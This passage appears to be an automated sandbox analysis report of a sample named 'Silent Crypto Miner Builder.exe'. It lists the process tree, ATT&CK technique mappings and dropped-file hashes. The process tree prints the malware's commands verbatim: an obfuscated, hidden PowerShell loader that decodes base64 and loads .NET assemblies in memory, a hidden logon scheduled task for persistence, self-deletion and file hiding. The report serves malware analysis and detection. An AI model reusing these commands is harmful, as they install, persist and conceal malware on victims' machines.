      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5800
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str.vbs"
      4⤵
      Checks computer location settings
      PID:4384
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str.bat" "
        5⤵
        
        PID:6120
      - C:\Users\Admin\AppData\Roaming\startup_str.bat.exe
        
        "C:\Users\Admin\AppData\Roaming\startup_str.bat.exe" -noprofile -w hidden -ep bypass -command $gingerbread_ZGT90N5CQZ = [System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Roaming\startup_str.bat').Split([Environment]::NewLine); foreach ($gingerbread_1KH5QPC857 in $gingerbread_ZGT90N5CQZ) { $gingerbread_IR2OYLS2I9 = [System.Text.RegularExpressions.Regex]::Replace('_0', '0', ' '); $gingerbread_IR2OYLS2I9 = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_IR2OYLS2I9, '_', 'gingerbread_2REG6QYLBJP6'); if ($gingerbread_1KH5QPC857 -match $gingerbread_IR2OYLS2I9) { $gingerbread_5Q959MQ6PK = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_1KH5QPC857, 'gingerbread_2REG6QYLBJP6', ''); $gingerbread_5Q959MQ6PK = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_5Q959MQ6PK, '#', '/');break; }; }; if ($gingerbread_5Q959MQ6PK.Contains('CHOQNLJXHRYDBXUDFLOEFXTOXDPILO')) { $gingerbread_5Q959MQ6PK = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_5Q959MQ6PK, 'CHOQNLJXHRYDBXUDFLOEFXTOXDPILO', ''); } else { exit }; $gingerbread_C3UENP8XTK = [string[]]$gingerbread_5Q959MQ6PK.Split('!'); $gingerbread_43B9R06ZVX = [System.Convert]::FromBase64String($gingerbread_C3UENP8XTK[0]); $gingerbread_L6GT4COAOJ = [System.Reflection.Assembly]::Load($gingerbread_43B9R06ZVX); $gingerbread_75K25BI6VC = $gingerbread_L6GT4COAOJ.EntryPoint; $gingerbread_75K25BI6VC.Invoke($null, $null); $gingerbread_ONPA8XRGXD = [System.Convert]::FromBase64String($gingerbread_C3UENP8XTK[1]); $gingerbread_P0L16O4G72 = [System.Reflection.Assembly]::Load($gingerbread_ONPA8XRGXD); $gingerbread_1JGKLRH6G6 = $gingerbread_P0L16O4G72.EntryPoint; $gingerbread_1JGKLRH6G6.Invoke($null, $null)
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:5372
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(5372);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2192
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C ATTRIB +H "C:\Users\Admin\AppData\Roaming\startup_str.bat.exe" & exit
        7⤵
        Hide Artifacts: Hidden Files and Directories
        
        PID:392
        
        C:\Windows\system32\attrib.exe
        
        ATTRIB +H "C:\Users\Admin\AppData\Roaming\startup_str.bat.exe"
        8⤵
        Views/modifies file attributes
        
        PID:4804

C:\Users\Admin\Desktop\Repo\bin\unam.exe
"C:\Users\Admin\Desktop\Repo\bin\unam.exe"
1⤵
- Executes dropped EXE
PID:3904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Repo\bin\dll.bat" "
1⤵
PID:5736
- C:\Users\Admin\Desktop\Repo\bin\dll.bat.exe
  "C:\Users\Admin\Desktop\Repo\bin\dll.bat.exe" -noprofile -w hidden -ep bypass -command $gingerbread_ZGT90N5CQZ = [System.IO.File]::ReadAllText('C:\Users\Admin\Desktop\Repo\bin\dll.bat').Split([Environment]::NewLine); foreach ($gingerbread_1KH5QPC857 in $gingerbread_ZGT90N5CQZ) { $gingerbread_IR2OYLS2I9 = [System.Text.RegularExpressions.Regex]::Replace('_0', '0', ' '); $gingerbread_IR2OYLS2I9 = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_IR2OYLS2I9, '_', 'gingerbread_2REG6QYLBJP6'); if ($gingerbread_1KH5QPC857 -match $gingerbread_IR2OYLS2I9) { $gingerbread_5Q959MQ6PK = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_1KH5QPC857, 'gingerbread_2REG6QYLBJP6', ''); $gingerbread_5Q959MQ6PK = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_5Q959MQ6PK, '#', '/');break; }; }; if ($gingerbread_5Q959MQ6PK.Contains('CHOQNLJXHRYDBXUDFLOEFXTOXDPILO')) { $gingerbread_5Q959MQ6PK = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_5Q959MQ6PK, 'CHOQNLJXHRYDBXUDFLOEFXTOXDPILO', ''); } else { exit }; $gingerbread_C3UENP8XTK = [string[]]$gingerbread_5Q959MQ6PK.Split('!'); $gingerbread_43B9R06ZVX = [System.Convert]::FromBase64String($gingerbread_C3UENP8XTK[0]); $gingerbread_L6GT4COAOJ = [System.Reflection.Assembly]::Load($gingerbread_43B9R06ZVX); $gingerbread_75K25BI6VC = $gingerbread_L6GT4COAOJ.EntryPoint; $gingerbread_75K25BI6VC.Invoke($null, $null); $gingerbread_ONPA8XRGXD = [System.Convert]::FromBase64String($gingerbread_C3UENP8XTK[1]); $gingerbread_P0L16O4G72 = [System.Reflection.Assembly]::Load($gingerbread_ONPA8XRGXD); $gingerbread_1JGKLRH6G6 = $gingerbread_P0L16O4G72.EntryPoint; $gingerbread_1JGKLRH6G6.Invoke($null, $null)
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:5824
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(5824);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:6108
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C ATTRIB +H "C:\Users\Admin\Desktop\Repo\bin\dll.bat.exe" & exit
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    PID:2720
  - - C:\Windows\system32\attrib.exe
      ATTRIB +H "C:\Users\Admin\Desktop\Repo\bin\dll.bat.exe"
      4⤵
      Views/modifies file attributes
      PID:3396
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4724
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str.vbs"
    3⤵
    - Checks computer location settings
    PID:5400
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str.bat" "
      4⤵
      PID:5684
    - - C:\Users\Admin\AppData\Roaming\startup_str.bat.exe
        
        "C:\Users\Admin\AppData\Roaming\startup_str.bat.exe" -noprofile -w hidden -ep bypass -command $gingerbread_ZGT90N5CQZ = [System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Roaming\startup_str.bat').Split([Environment]::NewLine); foreach ($gingerbread_1KH5QPC857 in $gingerbread_ZGT90N5CQZ) { $gingerbread_IR2OYLS2I9 = [System.Text.RegularExpressions.Regex]::Replace('_0', '0', ' '); $gingerbread_IR2OYLS2I9 = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_IR2OYLS2I9, '_', 'gingerbread_2REG6QYLBJP6'); if ($gingerbread_1KH5QPC857 -match $gingerbread_IR2OYLS2I9) { $gingerbread_5Q959MQ6PK = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_1KH5QPC857, 'gingerbread_2REG6QYLBJP6', ''); $gingerbread_5Q959MQ6PK = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_5Q959MQ6PK, '#', '/');break; }; }; if ($gingerbread_5Q959MQ6PK.Contains('CHOQNLJXHRYDBXUDFLOEFXTOXDPILO')) { $gingerbread_5Q959MQ6PK = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_5Q959MQ6PK, 'CHOQNLJXHRYDBXUDFLOEFXTOXDPILO', ''); } else { exit }; $gingerbread_C3UENP8XTK = [string[]]$gingerbread_5Q959MQ6PK.Split('!'); $gingerbread_43B9R06ZVX = [System.Convert]::FromBase64String($gingerbread_C3UENP8XTK[0]); $gingerbread_L6GT4COAOJ = [System.Reflection.Assembly]::Load($gingerbread_43B9R06ZVX); $gingerbread_75K25BI6VC = $gingerbread_L6GT4COAOJ.EntryPoint; $gingerbread_75K25BI6VC.Invoke($null, $null); $gingerbread_ONPA8XRGXD = [System.Convert]::FromBase64String($gingerbread_C3UENP8XTK[1]); $gingerbread_P0L16O4G72 = [System.Reflection.Assembly]::Load($gingerbread_ONPA8XRGXD); $gingerbread_1JGKLRH6G6 = $gingerbread_P0L16O4G72.EntryPoint; $gingerbread_1JGKLRH6G6.Invoke($null, $null)
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:5672
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(5672);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5220
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C ATTRIB +H "C:\Users\Admin\AppData\Roaming\startup_str.bat.exe" & exit
        6⤵
        Hide Artifacts: Hidden Files and Directories
        
        PID:4428
        
        C:\Windows\system32\attrib.exe
        
        ATTRIB +H "C:\Users\Admin\AppData\Roaming\startup_str.bat.exe"
        7⤵
        Views/modifies file attributes
        
        PID:5128

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dll.bat.exe.log

Filesize
2KB

MD5
96d753b69fa2fc92f8935955b96f1f48

SHA1
d6a0b083bcf9d549ea66d73358951f00d06ac3d5

SHA256
833848a23a8ec579c18d78d5a888aea54317a1522790f695c2859d4e68fe36ed

SHA512
c9c666c251a7aafd8c62304d29dd412e1759b8aeb0f649e844b97e454656bd11829e1f1a2edc3df4f8be70780fc760569a152e91967d0f5fbcd67d352d537ae0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3eb3833f769dd890afc295b977eab4b4

SHA1
e857649b037939602c72ad003e5d3698695f436f

SHA256
c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

SHA512
c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b5fffb9ed7c2c7454da60348607ac641

SHA1
8d1e01517d1f0532f0871025a38d78f4520b8ebc

SHA256
c8dddfb100f2783ecbb92cec7f878b30d6015c2844296142e710fb9e10cc7c73

SHA512
9182a7b31363398393df0e9db6c9e16a14209630cb256e16ccbe41a908b80aa362fc1a736bdfa94d3b74c3db636dc51b717fc31d33a9fa26c3889dec6c0076a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
32d05d01d96358f7d334df6dab8b12ed

SHA1
7b371e4797603b195a34721bb21f0e7f1e2929da

SHA256
287349738fb9020d95f6468fa4a98684685d0195ee5e63e717e4b09aa99b402e

SHA512
e7f73b1af7c7512899728708b890acd25d4c68e971f84d2d5bc24305f972778d8bced6a3c7e3d9f977cf2fc82e0d9e3746a6ccb0f9668a709ac8a4db290c551c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\34fb9bfc-da67-4947-b11b-bc4b7f8972b5.tmp

Filesize
5KB

MD5
97d6053b0078501b318e69fd2bb58370

SHA1
784860b32e6d8d03907bfc169535aba0b02f1366

SHA256
08b047c2bcf2714a06d99212e9e6bb67eb83a0e4579cefe97461d95762d3e88b

SHA512
db9c9ccd029bd45c1a8ede77d05c4f1c8f2c164ff87be3ac73a00d26b72b1e88f35aae2e1b75480803fafbc518a70ec5b48facf05bd3d00562c8150cbbc60dd8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

Filesize
70KB

MD5
e5e3377341056643b0494b6842c0b544

SHA1
d53fd8e256ec9d5cef8ef5387872e544a2df9108

SHA256
e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

SHA512
83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
3e4804702eed60e9036ab4aa5bb2bcf7

SHA1
808e5e2c9a8891597348e5b3c1cb481fff49f6b0

SHA256
7827128243d42d5db65ccf5addb429bf52506255c666aee90161231c58e8022d

SHA512
7b54d319273bbee2c96f9691c68f7639250cbf0817e32ebe2b562c03a8c6dd316eb944d88808d3fcf8c5d8ce5d16ef7d82395830925e6c811d23b632c4b5e46b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
a571ea32cd2f979169f18714d9795e6a

SHA1
da83410ea30cb7919df8d0ce13ddb38733387e77

SHA256
69fc6a7b2190cb89ada9b4ba7599e8535e083399045b79434ce8dc7af0f4af4c

SHA512
1661af49f6bbd2d64989c4924a7bbd7f3ec4daedda6c19fb327596bb626701e4c4b721d331eae29d5083ce78e69006d5fb29d2b8a4b8bee8ea765e9484ee04be

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
ac2b76299740efc6ea9da792f8863779

SHA1
06ad901d98134e52218f6714075d5d76418aa7f5

SHA256
cc35a810ed39033fa4f586141116e74e066e9c0c3a8c8a862e8949e3309f9199

SHA512
eec3c24ce665f00cd28a2b60eb496a685ca0042c484c1becee89c33c6b0c93d901686dc0142d3c490d349d8b967ecbbd2f45d26c64052fb41aad349100bd8f77

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
6e466bd18b7f6077ca9f1d3c125ac5c2

SHA1
32a4a64e853f294d98170b86bbace9669b58dfb8

SHA256
74fc4f126c0a55211be97a17dc55a73113008a6f27d0fc78b2b47234c0389ddc

SHA512
9bd77ee253ce4d2971a4b07ed892526ed20ff18a501c6ba2a180c92be62e4a56d4bbf20ba3fc4fbf9cf6ce68b3817cb67013ad5f30211c5af44c1e98608cb9e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
8KB

MD5
78380ee213efdba590a044999af8539b

SHA1
b4dafae2e9726a024f7c4dd6d99ae01447795afd

SHA256
1d2e1c1c3b0f425eff2a9071dd2ba70297fe505c6bfc4b9e14fd8a23c2d82cd0

SHA512
d6f8d3411eda6d6ca2565297e7957db56aea1d0201f69ce2c692f4d9dcdd2325872edae211ce79f1c17089e09766ea00e7e59cdba71cdf583e2e1b9ca754f3b6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
09b3c47ecf8a0d1608ded210073b599c

SHA1
479582ad0d72f0afabd103f909254b6783fb1ec8

SHA256
51b8ac89496f61a69b6da4e48ff4fc60ab41feeb14a1eb5b819753a0b09494b7

SHA512
d9e54c8d408cd20a58f8eecc79ebbfdaa9e62b85b63953c8aa1c28e483e3fa0af05323c335792f5ef9bb70a549ad42340d96b277278ee979bf0108f66288b4ba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db

Filesize
28KB

MD5
2eea87877d42e6ab1f243947d8543b95

SHA1
14fd2df01fffd62ca737b3757b9c2311fbf7a482

SHA256
bca60f7b5d519f1cf2eb6c86f1fcbaea3df0d226e38f76a2b5b72780919257dd

SHA512
396c592e0f69d3d6199afc3f87cf0b2bf6872d4e46e3b698dc4bef42485674d62cd7c487fa23c42e8cc8c293de448b7a3864bba7f84ac58168c311673d109ff1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
632d7e5a3dbfb6bd0bd8091157840301

SHA1
cfcae76b0425383ba41acb14ad8751c583b629e0

SHA256
6a0933cbfe8e4dacfc49593d6863b9d9182277d81eb5ae65cf7ec5730f9fed5e

SHA512
75ba2c073d716d3ac6d05ef62e16b7b67a3f07dcb7c9f932fd4ac5c19a382de19fcda3aebb00ec4c9f48614c9314f79036229193dd650e3cd2e1ba49d229f982

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3abce99e8dc8cb72870c697181b2a9f3

SHA1
7c69deaf8f7ba82abaff86c9ac3c0440d392289d

SHA256
2ebfe92e60831184fdca7cb6f4341e6ba501e37da6d974237a4c7ca4d1509c0b

SHA512
5b6896fb87d3969dd508c8b11bab3610ac900bb99bf243ec70467493968e06c008376f6d31b1cc87d0b3c71a4d6031987b5901af2f26851e09ad049fa10529c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b8548e39bdcd04e7209f4578c54a8df0

SHA1
d118d6dcbe67c300d627f4b7bc27c0e5d25696fe

SHA256
4510cabc8c2d0c262da32179634f4e76a6746a661085dc90ce6f79246d22441f

SHA512
551fa72596b1f93d3f6b80b7dc6922953f5fc9dbeda1dd5c34d62154baf944dfecc3acab241c5dd371cd6abbb8ee8cc5396aa0124b1d49c1d9f3d273afe931fc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
240B

MD5
7714764531501f44e8447a5fe7bcb54c

SHA1
20d2f1e43b0321b7d1c00462cdcf72353b5e52be

SHA256
5d27b346e17d32ce745b1bb28edba3bb39e83dd18b9435ea8ddbb5cd7f2928df

SHA512
f77df8f12532378af9309d764d4098cf82f3854296db97c406ddfb10308b8054e7bc82fc61e1b22eaa2ddb5c6985a086ca14093a9aba35f3791df23c7678a1e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u3ws5bvv.hgr.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
3KB

MD5
419626e683b15049bb0b91e0c72af782

SHA1
97a84e37a1bf1cb2559a7b9518ea8c57b99e70f7

SHA256
f185446dc953a87c85177e8af2c63723c49d2388304d50ddce17d7d7cb0d3268

SHA512
0c626310c9045d7b83dfc88326d0982219220cf746f0af0916d73158d77821587f810690fdacc0bccc1410c6757a2f9d47bf30c8cb6fadc081e22387715d21db

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
3KB

MD5
f6f4eaddd4886f2e894ab7cff4a13ea9

SHA1
85336e3b004e37e1a447d7368d8676ba9c214f03

SHA256
474d3e217e3d59da585c910b37ff3d5db9ae899ffce323fabc225641e3d2950b

SHA512
3c8ec48cf87ec3f09ffd8d68aba56b67a5fbf4a0a33cc6521a49cbd56e072c818a5d0f541cc6ae34505522d8a084f68bdbe5ad099098fe9f1587e9956f488b0c

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str.vbs

Filesize
111B

MD5
371257951e09cb56fafbbda4847cbcb7

SHA1
6d9dab286de574a099f6fe955720a1d87484cea3

SHA256
bb77d873388b64bacd10df67a60d012ed4acc5b03b7fa1070584b7133fa371b3

SHA512
1dffef10d8f25f6df8db17d09b278701211a40497d3aa8749676aeca3426cdc63232135984e74c8abf73442d917df7288b15d93229d8090684f3acba224f9bc1

Download Submit
C:\Users\Admin\Desktop\Repo\bin\dll.bat

Filesize
382KB

MD5
8b1f260a182f74419011f14a8ba21a37

SHA1
48d8da3f5971ebd6b358b6b63491b5e68f099a6c

SHA256
478ca90bdf1d94b880dd18c1fd1a5b6124d4e1c4b77c546df88a0aa992aeb225

SHA512
509a8b51cb3922f9be6c94029abbc4611b1ce438262abc9fef414780e97d7542d214ae42866ccaf540b52e6cfef017abfc00c891643b3b81753c9f4115ad64aa

Download Submit
C:\Users\Admin\Desktop\Repo\bin\dll.bat.exe

Filesize
445KB

MD5
2e5a8590cf6848968fc23de3fa1e25f1

SHA1
801262e122db6a2e758962896f260b55bbd0136a

SHA256
9785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3

SHA512
5c5ca5a497f39b07c7599194512a112b05bba8d9777bee1cb45bf610483edbffff5f9132fee3673e46cf58f2c3ba21af7df13c273a837a565323b82a7b50a4d8

Download Submit
C:\Users\Admin\Desktop\Silent Crypto Miner Builder.exe

Filesize
139KB

MD5
29d9c4a6c0be4ebb665ca5f423da7bdb

SHA1
d22b7b928436ba4f9d7a3a40a6db20a227b57c2a

SHA256
d833831e38738d03ed6156ec458d3252c379cf7c9c986fcfe8626184d3bceafd

SHA512
114e82df03e624ef350a5c71bd05594f9075afce7a2d978ede81a9cc086a9d87fec7884b5f5e7e1b52b8a24741fdaf453033b486b87d79cc599af37162870d0d

Download Submit
memory/2372-247-0x000002195E4B0000-0x000002195F4B0000-memory.dmp

Filesize
16.0MB

Download
memory/3300-260-0x00000242A66D0000-0x00000242A66DA000-memory.dmp

Filesize
40KB

Download
memory/3300-261-0x00000242A6680000-0x00000242A66CA000-memory.dmp

Filesize
296KB

Download
memory/5372-314-0x00000202214D0000-0x00000202214DC000-memory.dmp

Filesize
48KB

Download
memory/5372-315-0x00000202214E0000-0x00000202214F6000-memory.dmp

Filesize
88KB

Download
memory/5972-242-0x0000018C60F50000-0x0000018C60F72000-memory.dmp

Filesize
136KB

Download
memory/5972-232-0x0000018C469F0000-0x0000018C46A16000-memory.dmp

Filesize
152KB

Download